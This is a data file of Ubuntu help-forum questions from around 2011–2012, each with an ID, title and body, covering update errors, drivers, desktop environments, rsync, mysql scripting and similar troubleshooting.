99864	programming error in 'aptdaemon '	using ubuntu 11.10 while performing updates through the update manager i get the following message : an unhandlable error occured there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . details traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : method has died unexpectedly ! , e : sub-process returned an error code ( 100 ) , e : method /usr/lib/apt/methods/ did not start correctly tried some of the fixes that were posted but did not work . what shall i do to fix this issue ?
99865	help needed running apps from usb	here is my situation : i have a 14 gb usb stick with ubuntu 11.10 , and loads of video files , and ebooks for use at the pub/coffee shop/park away from my main computer at home . i have a dell mini 9 netbook with a dead/crashed 8gb hdd . i do n't have any money to replace the netbook or hdd - no really , i do n't . here is what i would like to do with help , instructions , and assistance if it is possible/not completely stupid : i want to be able to use my dead netbook ( with good keyboard , trackpad and screen ) to : watch *.avi video ( and other video files like mkv etc ) , so would like the codecs for the built-in video/media player in ubuntu 11.10 or help installing vlc on the usb stick . read ebooks using fbreader or calibre 's built-in reader soiftware so need assistance , instructions to install/run that software from the usb stick ... surf the web , so need to be able to install the wi-fi drivers if possible do i just need to start the netbook with the usb stick in , connected by cable to the internet router , and run software centre ? if i do that and reboot will the ubuntu on the usb stick then include vlc media player and calibre/fb reader ? if not , how can i fix that up please ? is it far more complex than that , and if so , can anyone help me ? i am a beginner with ubuntu , but i know about the terminal , and sudo , and can run simple commands like sudo get-apt upgrade .
99866	how to switch the window buttons to the left in cinnamon ?	i tried ubuntu tweak and dconf-editor but nothing seemed to help . perhaps if there is an extension for the same , please share if you happen to know this or any other workaround .
99867	error executing a command in ubuntu	i am a newbie to ubuntu . when i execute a command in a terminal i get an error . the command is : prompt > ./h_affine.ln -haraff -i img1.ppm -o img1.haraff -thres 1000 the error is : modglue : :ext_process : :fork : execvp failed . the above command is for converting an image to an array of values . please help to sort this out . i have no idea what this error says .
99869	software-center update-manager both get segmentation fault	i am using ubuntu 11.10 . after upgrading , neither software-center nor update-manager would run . i get a segmentation fault when launched from the console . i can do sudo apt-get update without problem , but the upgrade does not work neither does the installation of any package i.e. , sudo apt-get upgrade or sudo apt-get install emacs simply returns the prompt back and nothing happens . more exactly : software-center gives this : 2012-01-30 16:07:17,144 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 segmentation fault nothing else happens then . with update-manager : segmentation fault a window flashes and immediately goes away . with sudo apt-get install emacs and sudo apt-get upgrade nothing happens with either of these two commands . sudo apt-get upgrade works well though
99871	hp-probe find printer network or alternative	i am working in a environment where we have different network . one of them are used for printers ( 192.168.x.x ) and 1 for wireless network ( 10.1.x.x ) . i need to add a printer hp c3505 ( 192.168.x.x ) on my ubuntu ( 10.1.x.x ) . i am using hp-probe to find out what is the ip but it can not find it , i am guessing because i am not on the same network . i use : hp-probe -bnet is there another tool i can use to find the ip of the printer ?
99874	how do i turn off gnome shell activities animations ?	i 'd like to turn off the animation ( windows zoom back ) effect when the activities overview is activated because it really gets slow and laggy with a lot of open windows . is there any way to do this , as internet search only lead me to the `` disable window animations extension '' which obviously only affects window animations but not the animation of the overview .
99876	ubuntu iso autorun issues	i have just downloaded ubuntu 10.04 . once done , i mount the iso onto a virtual cd drive and attempt to run the cd and install linux as a windows application . the problem is each time i mount the iso and doubleclick to start the cd , it just opens as folder . this happens even when i rightclick and select autorun . can anyone suggest some help , please ? i desperatelty need to get ubuntu 10.04 installed .
99882	why is pulseaudio only working properly in system mode ( for me ) ?	i seem to be having an issue with sound at the moment , where pulseaudio will only work if i run `` sudo pulseaudio -- system '' after i 've killed it . it seems to hang on startup , and i have to run `` sudo kill -9 [ number of process detected by 'sudo lsof | grep /dev/snd ' ] '' before i can run pulseaudio in system mode . is there a way to get pulseaudio 's config reset somehow to stop it hanging ? or at least work out why pulse seems to hang when not in system mode ?
99887	dell inspiron xps wireless problem	i installed ubuntu 10.04 lts beside windows xp on a different partition . but when i first turned on ubuntu , i saw an exclamation mark on the wireless symbol on the taskbar . when i click on that icon , i ca n't find any network . my wireless driver is : dell wireless 1370 wlan mini-pci card
99893	hotkey to access menu in gnome	in windows you can access the menu of an application by pressing alt . from what i read the same is supposed to be true in kde . however how can i access the menu via in hotkey when i use gnome ?
99895	can i mount single folders in a 2nd hd to a master folder i have on my main hd ?	essentially i have a server setup as a media device running muthtv for my main tv off the ubuntu comp and then i have several other pc 's in the house which connect to the shared folder of my server to watch from the other tvs . to make things look nice and organized within both myth and my folders i divided stuff up as such , a main video folder which is shared and within it a movie , tv , stand up , music videos etc.. i previously ran out of space on the main hd and bought a new one , what i did then was transfered the entire movie folder to the new hd and mounted it in the video folder as 'movies ' essentially not messing with my organizational scheme . however , now its my tv folder which is almost too big to sit on a hd by itself without allowing for room to grow . so what i want to do now is get another hd and instead of mounting the entire hd in the video folder somewhere , to put it elsewhere and just mount folders i have put in the new hd to the tv folder.. essentially meaning i could have 'the big bang theory ' appear in my tv folder but actually be located on the new hd.. i also would like to have many different shows folders come off that new hd essentially mounting many folders to that tv folder.. if that makes sense . i am not sure mounting is the word i am looking for for how to accomplish this but i was n't sure what other methods there were . thanks in advance .
99898	how to rsync a folder when the folder path contains special chars ?	i would like to rsync a folder but have some problems doing so due to the fact that the folder 's path contains some special chars . my rsync command uses to look like this : rsync -pavzbe ssh user @ server.com : '' /home/user/b端cher '' /home/user/ i get the following message : unexpected remote arg : user @ server.com : /home/gast/b\\ # 303\ # 274cher rsync error : syntax or usage error ( code 1 ) at main.c ( 1232 ) [ sender=3.0.8 ] i tried the following command instead but got the same result rsync -pavzbe -- iconv=cp1250 , utf-8 ssh user @ server.com : '' /home/user/b端cher '' /home/user/ who can help ?
99899	how to read ftp login data stored within nautilus ?	i forgot my ftp user name and password , yet i have a bookmark stored within nautilus so i can still access it . i wonder if i could extract these data from nautilus .
99900	how do i update my own application in the software center ?	some applications use web services to provide services to users ( especially unity lenses ) . things with apis that might change , or things that might be updated . so what happens when someone submits a reddit lens and then a week later it breaks and it needs to be updated ? is there a process where i as an application author can update my application in the software center independent of the ubuntu release cycle ?
99901	what should i think about before using one partition as /home for two different systems ?	my situation is as follows : ubuntu with gnome-shell installed on /dev/sda3 , with it 's own /home directory . lubuntu installed on /dev/sda5 , with it 's own /home directory . data files ( music , movies , stuff for school ) stored on /dev/sda4 . i use both ubuntu and lubuntu and i would like to keep this setup of two different partitions , instead of one partition with both ubuntu and lubuntu-desktop installed on it . i would like to use /dev/sda4 as a /home partition for both ubuntu and lubuntu . this would have quite some advantages : applications in lubuntu and ubuntu would always be up-to-date with each other because they share the same ~/.config directory right now , i usually save stuff in /dev/sda4 , but as this is not my real /home directory , i usually have to refer to /dev/sda4 in a lot of applications when e.g . saving something . this annoys me , i 'd like to just be able to save it in my /home directory . in this question , i 've read the second and third answer , about problems that might appear . but as i 'm planning to use both ubuntu 12.04 and lubuntu 12.04 , i doubt that there will be any problems , as these distributions are very much alike , and they are released on approximately the same date ( so it 's not like using ubuntu 12.04 and lubuntu 10.04 ) . is there anything i should be aware of before implementing this setup ? would there be any consequences , other than the ones i just mentioned ? is there a way to get approximately the same results , in a safer way ?
99904	take text from a file and insert to a mysql table using a script	i would like to take data ( some text ) from a file and insert it into a mysql field , using a script . i have tried : mysql -u root -p password dbname < < insert into tblename ( fieldname ) values ( load_file ( 'filename ' ) ) ; and mysql -u root -p password dbname < < eof insert into tblename ( fieldname ) values ( ' $ filename ' ) ; eof
99907	most appropriate desktop environment for corporate desktop	i have deployed a few ubuntu 10.04 lts systems for small business users . it uses gnome 2 de and users are happy with it . with upcoming new lts release i have a problem - default de unity is not suitable for small business environment . most work is done with libreoffice programs , internet browser , email client and file manager . current options are either kubuntu or xubuntu . each option has its own drawbacks - kde might be too complicated and have some desktop compositing problems on low end systems , while xubuntu lacks some features as it is preconfigured with alternative , lighter , software . are there any other options of stable and supported desktop environments ?
99908	cpu/gpu fan not working properly on intel macbook 4,1 under ubuntu 11.10	i just installed ubuntu 11.10 on my intel macbook 4,1 and i have noticed that the cpu temperature is getting very high and the fan , although working , is not increasing its speed to cope with the increased temperature as it did under mac osx ... this is the first time i 've run ubuntu on an apple machine so i 'm not familiar with the compatibility issues .
99911	lubuntu alternate install stops at *starting bluetooth	ok i dont realy know what im doing . i have a load of eee pcs that i want to install lubuntu on i have used the universal usb installer to run from usb . installing lubuntu 11.10 alternate os . i plug in the usb turn on pc enter setup set os install status to start , set boot disck order to usb then reboot . select option to install lubuntu follow all the instructions no special settings all default or as you expect . get to the end and reboot i have tried both leaving the usb in and removing it each time when the pc restarts i just get the lines *starting ntp *starting bluetooth then nothing leftit for hours still nothing any ideas for a simleton please
99918	why do n't my desktop icons stay in place ?	i 'm running ubuntu 11.10 and a few days ago i switched to gnome3 . now i have still a few folders i 'm using for everyday work on my desktop . i want to group them in specific areas of the desktop to reflect my working style ... but every time i log out and in again , all folders , icons etc . are grouped at the left border of the screen . is there some way to stop this ( meaning : keep the icons in the places where i put them ) ? i tried the `` keep aligned '' switch in the desktop right-klick menu , but this did n't change anything . it only helped to align icons on a virtual grid . then i did web searches in google and olso specifically in `` ask ubuntu '' but to no avail . the only question i found ( april 2011 ) was unanswered . update : the question i 'm referring to is one of several dealing with icons that end up being stacked one over the other . i did n't see any thread dealing with this problem .
99919	a plain text viewer which can hide lines that meet specified regexps	each time i 've been looking for `` something i do n't know exactly what '' in big text file , e.g . log-file , huge shell script , i wish to hide all the lines of certain types . i wish to select certain lines with a set of regexps and either hide them or highlight . it would be nice if i could select line blocks e.g . those lines between '' function ... ( ) { `` and corresponding '' } '' can you suggest me such a viewer ?
99925	switch to a different workspace while using a vm	i 'm using vmware workstation 8 on an ubuntu 11.10 host . is there a way i can exclude certain inputs from going to the virtual machine and instead direct those inputs to the host ? ideally what i 'd like to do is be able to use the control+alt+arrow key shortcut to move to a different workspace even if i am focused in a virtual machine . does anyone know a way i can accomplish this ? thanks ! ! ( i 'm using unity , but i 'd switch to gnome-shell or kde or whatever for this feature if necessary ! )
99932	missing window list on bottom panel in gnome-classic	i am running ubuntu 11.10 with gnome classic , and i got one more problem with the display . when i launch programs , the corresponding icons are not on the bottom panel anymore ... how can i solve this ?
99934	auto reconnect wifi ?	i use 10.04 on my laptop . whenever my router switches on and off i have to manually click on a popup ok button to re-enable connection to router . how can this be done automatically ? thanks .
99935	how to install google earth on ubuntu 11.10 ?	i found a tutorial , but it explicitly notes that it is for 11.04 . based on your own experience , is it also applicable to 11.10 ? based on your own experience , does it work to just download and install the .deb file from the official page ?
99936	updage manager considers generic packages as untrusted packages	update manager refuses to install updates because it would require installing untrusted packages . however , if i look at the list of so-called untrusted packages , those seem like they should be trusted . why are all those packages treated as `` untrusted '' while they obviously are mainstream packages ? here is the list : accountsservice acpid aisleriot alsa-utils app-install-data-partner apport apport-gtk apturl apturl-common at-spi2-core banshee banshee-extension-soundmenu banshee-extension-ubuntuonemusicstore baobab bind9-host binutils bluez bluez-alsa bluez-cups bluez-gstreamer brltty bzip2 colord command-not-found command-not-found-data compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default cups cups-bsd cups-client cups-common cups-ppdc deja-dup desktop-file-utils dnsutils empathy empathy-common eog evince evince-common file-roller firefox firefox-globalmenu firefox-gnome-support gbrainy gcalctool gconf2 gconf2-common gedit gedit-common ghostscript ghostscript-cups ghostscript-x gir1.2-atspi-2.0 gir1.2-gconf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-3.0 gir1.2-gtksource-3.0 gir1.2-totem-1.0 gir1.2-webkit-3.0 gnome-accessibility-themes gnome-bluetooth gnome-control-center gnome-control-center-data gnome-desktop3-data gnome-font-viewer gnome-games-common gnome-keyring gnome-mahjongg gnome-online-accounts gnome-orca gnome-power-manager gnome-screenshot gnome-search-tool gnome-session-canberra gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-utils-common gnomine gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hpijs hplip hplip-cups hplip-data indicator-datetime indicator-session indicator-sound initramfs-tools initramfs-tools-bin initscripts isc-dhcp-client isc-dhcp-common language-selector-common language-selector-gnome libaccountsservice0 libarchive1 libasound2-plugins libatk-adaptor libatspi2.0-0 libbind9-60 libbluetooth3 libbrlapi0.5 libbz2-1.0 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libcolord1 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3-gnutls libdecoration0 libdns69 libevince3-3 libfreetype6 libgail-3-0 libgail-3-common libgck-1-0 libgconf2-4 libgcr-3-1 libgnome-bluetooth8 libgnome-control-center1 libgnome-desktop-3-2 libgoa-1.0-0 libgrip0 libgs9 libgs9-common libgssapi-krb5-2 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtksourceview-3.0-0 libgtksourceview-3.0-common libgudev-1.0-0 libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libhpmud0 libicu44 libimobiledevice2 libisc62 libisccc60 libisccfg62 libjasper1 libk5crypto3 libkrb5-3 libkrb5support0 libldap-2.4-2 liblightdm-gobject-1-0 liblwres60 libmetacity-private0 libmono-zeroconf1.0-cil libnautilus-extension1 libnm-glib-vpn1 libnm-glib4 libnm-util2 libnotify0.4-cil libnux-1.0-0 libnux-1.0-common libpam-gnome-keyring libpam-modules libpam-modules-bin libpam-runtime libpam0g libpulse-mainloop-glib0 libpulse0 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-emailmerge libreoffice-style-human libsane-hpaio libsmbclient libsyncdaemon-1.0-1 libt1-5 libtotem0 libubuntuone-1.0-1 libubuntuone1.0-cil libudev0 libunity-core-4.0-4 libunity6 libv4l-0 libwbclient0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxml2 lightdm linux-generic linux-headers-3.0.0-15 linux-headers-3.0.0-15-generic linux-headers-generic linux-image-3.0.0-15-generic linux-image-generic linux-libc-dev lzma metacity metacity-common mobile-broadband-provider-info mousetweaks nautilus nautilus-data nautilus-sendto-empathy network-manager nux-tools onboard pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-brlapi python-cups python-cupshelpers python-gobject python-gobject-cairo python-launchpadlib python-libxml2 python-papyon python-problem-report python-pyatspi2 python-software-properties python-ubuntuone-client qdbus samba-common samba-common-bin seahorse shotwell simple-scan smbclient sni-qt software-center software-properties-common software-properties-gtk system-config-printer-common system-config-printer-gnome system-config-printer-udev sysv-rc sysvinit-utils telepathy-indicator thunderbird thunderbird-globalmenu thunderbird-gnome-support tomboy totem totem-common totem-mozilla totem-plugins ttf-opensymbol ubuntu-docs ubuntuone-client ubuntuone-client-gnome udev unity-services update-manager update-manager-core update-notifier update-notifier-common upstart vinagre x11-common xorg xserver-common xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-video-all xserver-xorg-video-intel xul-ext-ubufox the output of sudo apt-get update & & sudo apt-get upgrade is : ign http : //security.ubuntu.com oneiric-security inrelease ign http : //nl.archive.ubuntu.com oneiric inrelease ign http : //nl.archive.ubuntu.com oneiric-updates inrelease ign http : //nl.archive.ubuntu.com oneiric-backports inrelease ign http : //archive.canonical.com oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //extras.ubuntu.com oneiric inrelease get:1 http : //nl.archive.ubuntu.com oneiric release.gpg [ 198 b ] get:2 http : //nl.archive.ubuntu.com oneiric-updates release.gpg [ 198 b ] get:3 http : //security.ubuntu.com oneiric-security release.gpg [ 198 b ] get:4 http : //archive.canonical.com oneiric release.gpg [ 198 b ] ign http : //ppa.launchpad.net oneiric release.gpg get:5 http : //extras.ubuntu.com oneiric release.gpg [ 72 b ] hit http : //nl.archive.ubuntu.com oneiric-backports release.gpg get:6 http : //security.ubuntu.com oneiric-security release [ 40.8 kb ] hit http : //nl.archive.ubuntu.com oneiric release get:7 http : //nl.archive.ubuntu.com oneiric-updates release [ 40.8 kb ] hit http : //extras.ubuntu.com oneiric release ign http : //ppa.launchpad.net oneiric release hit http : //archive.canonical.com oneiric release hit http : //nl.archive.ubuntu.com oneiric-backports release hit http : //extras.ubuntu.com oneiric/main sources hit http : //archive.canonical.com oneiric/partner i386 packages hit http : //nl.archive.ubuntu.com oneiric/main sources hit http : //nl.archive.ubuntu.com oneiric/restricted sources hit http : //nl.archive.ubuntu.com oneiric/universe sources hit http : //nl.archive.ubuntu.com oneiric/multiverse sources hit http : //nl.archive.ubuntu.com oneiric/main i386 packages hit http : //nl.archive.ubuntu.com oneiric/restricted i386 packages hit http : //nl.archive.ubuntu.com oneiric/universe i386 packages hit http : //nl.archive.ubuntu.com oneiric/multiverse i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //extras.ubuntu.com oneiric/main i386 packages ign http : //extras.ubuntu.com oneiric/main translationindex ign http : //archive.canonical.com oneiric/partner translationindex hit http : //nl.archive.ubuntu.com oneiric/main translationindex hit http : //nl.archive.ubuntu.com oneiric/multiverse translationindex hit http : //nl.archive.ubuntu.com oneiric/restricted translationindex hit http : //nl.archive.ubuntu.com oneiric/universe translationindex get:8 http : //nl.archive.ubuntu.com oneiric-updates/main sources [ 120 kb ] get:9 http : //security.ubuntu.com oneiric-security/main sources [ 26.0 kb ] get:10 http : //nl.archive.ubuntu.com oneiric-updates/restricted sources [ 1,337 b ] get:11 http : //nl.archive.ubuntu.com oneiric-updates/universe sources [ 40.4 kb ] get:12 http : //nl.archive.ubuntu.com oneiric-updates/multiverse sources [ 3,654 b ] get:13 http : //nl.archive.ubuntu.com oneiric-updates/main i386 packages [ 280 kb ] get:14 http : //security.ubuntu.com oneiric-security/restricted sources [ 14 b ] get:15 http : //security.ubuntu.com oneiric-security/universe sources [ 8,967 b ] get:16 http : //security.ubuntu.com oneiric-security/multiverse sources [ 1,629 b ] get:17 http : //security.ubuntu.com oneiric-security/main i386 packages [ 74.6 kb ] get:18 http : //nl.archive.ubuntu.com oneiric-updates/restricted i386 packages [ 2,968 b ] get:19 http : //nl.archive.ubuntu.com oneiric-updates/universe i386 packages [ 92.1 kb ] get:20 http : //nl.archive.ubuntu.com oneiric-updates/multiverse i386 packages [ 6,336 b ] get:21 http : //nl.archive.ubuntu.com oneiric-updates/main translationindex [ 74 b ] get:22 http : //nl.archive.ubuntu.com oneiric-updates/multiverse translationindex [ 72 b ] get:23 http : //nl.archive.ubuntu.com oneiric-updates/restricted translationindex [ 71 b ] get:24 http : //nl.archive.ubuntu.com oneiric-updates/universe translationindex [ 73 b ] hit http : //nl.archive.ubuntu.com oneiric-backports/main sources hit http : //nl.archive.ubuntu.com oneiric-backports/restricted sources hit http : //nl.archive.ubuntu.com oneiric-backports/universe sources get:25 http : //security.ubuntu.com oneiric-security/restricted i386 packages [ 14 b ] get:26 http : //security.ubuntu.com oneiric-security/universe i386 packages [ 24.7 kb ] hit http : //nl.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //nl.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //nl.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //nl.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //nl.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //nl.archive.ubuntu.com oneiric-backports/main translationindex hit http : //nl.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //nl.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //nl.archive.ubuntu.com oneiric-backports/universe translationindex err http : //ppa.launchpad.net oneiric/main sources 404 not found err http : //ppa.launchpad.net oneiric/main i386 packages 404 not found get:27 http : //security.ubuntu.com oneiric-security/multiverse i386 packages [ 3,345 b ] get:28 http : //security.ubuntu.com oneiric-security/main translationindex [ 73 b ] get:29 http : //security.ubuntu.com oneiric-security/multiverse translationindex [ 72 b ] get:30 http : //security.ubuntu.com oneiric-security/restricted translationindex [ 70 b ] get:31 http : //security.ubuntu.com oneiric-security/universe translationindex [ 73 b ] ign http : //extras.ubuntu.com oneiric/main translation-en_us hit http : //nl.archive.ubuntu.com oneiric/main translation-en hit http : //nl.archive.ubuntu.com oneiric/multiverse translation-en hit http : //nl.archive.ubuntu.com oneiric/restricted translation-en hit http : //nl.archive.ubuntu.com oneiric/universe translation-en get:32 http : //nl.archive.ubuntu.com oneiric-updates/main translation-en [ 130 kb ] ign http : //archive.canonical.com oneiric/partner translation-en_us hit http : //security.ubuntu.com oneiric-security/main translation-en ign http : //extras.ubuntu.com oneiric/main translation-en hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //nl.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //nl.archive.ubuntu.com oneiric-updates/restricted translation-en get:33 http : //nl.archive.ubuntu.com oneiric-updates/universe translation-en [ 55.1 kb ] ign http : //archive.canonical.com oneiric/partner translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us hit http : //nl.archive.ubuntu.com oneiric-backports/main translation-en get:34 http : //security.ubuntu.com oneiric-security/universe translation-en [ 17.4 kb ] hit http : //nl.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //nl.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //nl.archive.ubuntu.com oneiric-backports/universe translation-en ign http : //ppa.launchpad.net oneiric/main translation-en fetched 971 kb in 1s ( 711 kb/s ) w : failed to fetch http : //ppa.launchpad.net/elementaryart/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/elementaryart/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
99938	nvidia vs . battery dilemma	i recently purchased a lg a410 notebook , with nvidia geforce 310m gpu . when i installed ubuntu ( 11.10 ) my battery used to last about 3 hours . but , since i moved to gnome3 , i noticed that i didnt have the proper graphics driver installed . so , i installed the nvidia drivers , and everything , including 3d works perfect . the problem is : my battery now lasts only for less than 1 hour . i have read on some forums that nvidia drivers are known to consume more battery power . since my gpu does not seem to have the `` optimus '' technology , there is no use to try the `` bumblebee project '' . i had the idea to add to grub the option of loading or not the nvidia graphics . this way , when i wanted to save battery , i would boot into the `` no nvidia mode '' . but i have had no success on disabling the nvidia drivers . i have tried to add it to the /etc/modprobe.d/blacklist.conf as `` blacklist nvidia '' , `` blacklist nvidia-common '' , and `` blacklist nvidiabl '' but nothing seems to work . is there a way i can choose between booting with or without the nvidia drivers ? ? obs : changing the xorg.conf file to driver `` nv '' or driver `` intel '' does not work ( x does not start )
99943	broken external harddrive ( repair help )	a friend has asked me if i could fix this external harddrive without formating it . i mean , i need to get the files back and it seems to be corrupted . i took a picture : ( its in spanish though )
99944	notebook msi gt640 - noisy fan - ubuntu 11.10 x64	i have all time this issue when using ubuntus , the fan ( fans ? ) runs most off the time and between 60 % ~100 % even in idle which is weird . the gpu temperatures are mostly around 80 degrees and i do n't think it 's right : ( i always use jupiter with power saving preset and add the line in linux default like this : quiet splash pcie_aspm=force i915.i915_enable_rc6=1 so it helps a little ( fan just does n't run all the time 100 % ... ) what else can i do ? the notebook spec is : core i7-720 ( 8 threads ) nvidia gts250m so it 's rather one of the first , not so silent and cold notebooks ; ) , with core i7 family and without optimus technology ( as nvidia gpu is the only graphic card built-in ) but anyway i do n't have theese strange hot times in windows 7 .
99946	where is adobe acrobat reader	i wanted to make it easier to use some programs . i wanted them to be on my desktop . i found them using dash and dragged them to the desktop . when i now try to execute them , i get the message that they are not trusted applications . i searched and found a post that says to right click - properties - permissions and check make executable . the problem is that i ca n't because i am not the owner - root is . how do i fix this ? if i drag it from an executable place , it should be executable in the new place .
99948	unable to connect my dell bh200 blue tooth head set	hi i am using dell studio laptop with ubuntu 11.04 and very recently i bought dell bh 200 blue tooth head set but i am not able to connect and pair with my laptop , a quick googling showed few examples for setting it up i amnot able to find alsa in the sound settings so that ican listen to the music , how do i set it up , kindly help me out
99949	how do i download things from the source repository ?	i want to look over some programs to help me learn programming , so i enabled the source repository in ubuntu . how do i download things from that repository ?
99950	how to install and configure ipython so it uses python3.2 on 11.10 ?	how to install and configure ipython so it uses python3.2 on 11.10 ? i 've checked that installing by sudo apt-get install ipython will uses python2.7 . [ edit1 ] $ sudo python3 configure.py determining the layout of your qt installation ... this is the gpl version of pyqt 4.8.5 ( licensed under the gnu general public license ) for python 3.2.2 on linux2 . type '2 ' to view the gpl v2 license . type '3 ' to view the gpl v3 license . type 'yes ' to accept the terms of the license . type 'no ' to decline the terms of the license . do you accept the terms of the license ? yes found the license file pyqt-gpl.sip . checking to see if the qtgui module should be built ... checking to see if the qthelp module should be built ... checking to see if the qtmultimedia module should be built ... checking to see if the qtnetwork module should be built ... checking to see if the qtdeclarative module should be built ... checking to see if the qtopengl module should be built ... checking to see if the qtscript module should be built ... checking to see if the qtscripttools module should be built ... checking to see if the qtsql module should be built ... checking to see if the qtsvg module should be built ... checking to see if the qttest module should be built ... checking to see if the qtwebkit module should be built ... checking to see if the qtxml module should be built ... checking to see if the qtxmlpatterns module should be built ... checking to see if the phonon module should be built ... checking to see if the qtassistant module should be built ... checking to see if the qtdesigner module should be built ... checking to see if the dbus support module should be built ... dbus v1 does not seem to be installed . qt v4.7.4 free edition is being used . sip 4.12.4 is being used . the qt header files are in /usr/include/qt4 . the shared qt libraries are in /usr/lib/i386-linux-gnu . the qt binaries are in /usr/bin . the qt mkspecs directory is in /usr/share/qt4 . these pyqt modules will be built : qtcore , qthelp , qtnetwork , qtdeclarative , qtscript , qtscripttools , qtsvg , qttest , qtwebkit , qtxml , qtxmlpatterns , qtdesigner . the pyqt python package will be installed in /usr/lib/python3/dist-packages . pyqt is being built with generated docstrings . pyqt is being built with 'protected ' redefined as 'public ' . the designer plugin will be installed in /usr/lib/i386-linux-gnu/qt4/plugins/designer . the pyqt .sip files will be installed in /usr/share/sip/pyqt4 . pyuic4 , pyrcc4 and pylupdate4 will be installed in /usr/bin . generating the c++ source for the qtcore module ... sh : /usr/bin/sip : not found error : unable to create the c++ code . $ which sip $ sudo apt-get install sip reading package lists ... done building dependency tree reading state information ... done e : unable to locate package sip $
99952	laggy windows , and cant install post release update driver	when i move my windows around they are really laggy . i had a feeling it 's because ubuntu is n't taking full advantage of my graphics card so i went to install the additional drivers . the normal proprietery one does nothing to help the window issue and everytime i try and install the post release update it says `` sorry installation of this driver failed ''
99954	wget to download a link.php	i am having trouble finding a way to use wget to download a file from a link that uses php to point to the download . for example , if i want to write a script to download ... say superantispyware portable every day so i have a fresh copy all the time ( only handy if you run windows , which i do n't but i digress ) the download link looks like http : //www.superantispyware.com/sasportable.php . i do n't want the php file , i want the file it links to . in a browser i assume some server side magic happens to make this work . is there an incantation i can use to emulate what my browser does ? can curl do this ? is it impossible ? i want to do this so i can update a series of programs , and as the list grows , it 's becoming a real chore !
99970	i killed my gui and startx cant find a `` screen ''	first off let me mention that this problem happened a while ago so i may have forgotten some of the details . a while ago i was trying to get used to backtrack5 and i was doing pretty well i think . i learned that you should n't be using root exclusively so i was creating a user account and trying to give it all the right permissions and access . i do n't remember what did it specially but this is part of the error message i 'm getting from xorg.0.log : ( ii ) module nvidia : vendor= '' nvidia corporation '' compiled for 4.0.2 , module version = 1.0.0 module class : x.org video driver ( ee ) nvidia : failed to load the nvidia kernel module . please check your ( ee ) nvidia : system 's kernel log for additional error messages . ( ii ) unloadmodule : `` nvidia '' ( ii ) unloading /usr/lib/xorg/extra-modules/nvidia_drv.so ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) ( ee ) no drivers available . fatal server error : no screens found now knowing that this was a problem of my own doing i took a look at my history to try and figure out what i did wrong but i 'm not very savvy in such things ... i 'll paste some of the relevant command history my pasted command history i have an idea of what the problem might be but i have no idea how i would fix it . if anyone could help me it would be greatly appreciated . and if i should provide anymore information just let me know . ps sorry if this is a bit verbose . and sorry that the command history is n't formatted properly for this site .
99975	is there a way to have event sounds ?	basically , i want to have ubuntu 11.10 play sounds when events occur , like adding and removing a usb or firewire device , when it finds hardware , pops up a notification , or mounts a new volume . like how kde and windows does that . is there a program or a daemon that can monitor for this stuff , or can it be doe a different way ?
99978	reset amarok version	i 'm running ubuntu 10.04 and i tried amarok . it was quite cool , but i wanted to try the latest version so i typed into the console : sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update sudo apt-get upgrade worked so far i got an updated version now . but the problem is this version is not very compatible to ubuntu 10.04 and many features are n't working properly ... how can i change it back ?
99982	how do i make a clean install of 11.10 recognize my intel g31 onboard graphics card ?	a quick inspection of my graphics card shows : brain @ goblinmarket : /etc/x11 $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 02 ) however , when looking at the unity panel system info : graphics are listed as unknown , there are no additional drivers to access , and the refresh rate and colours are producing severe eyestrain , despite changing them in ccsm . i found another question , which replicated the same problem . however , after installing mesa-utils unity now sees the card as a g33 , the terminal sees it as g31 , and colours and refresh rate are still bugged . are there any additional steps i need to take to have ubuntu auto-configure colour and refresh rate to standard norms ?
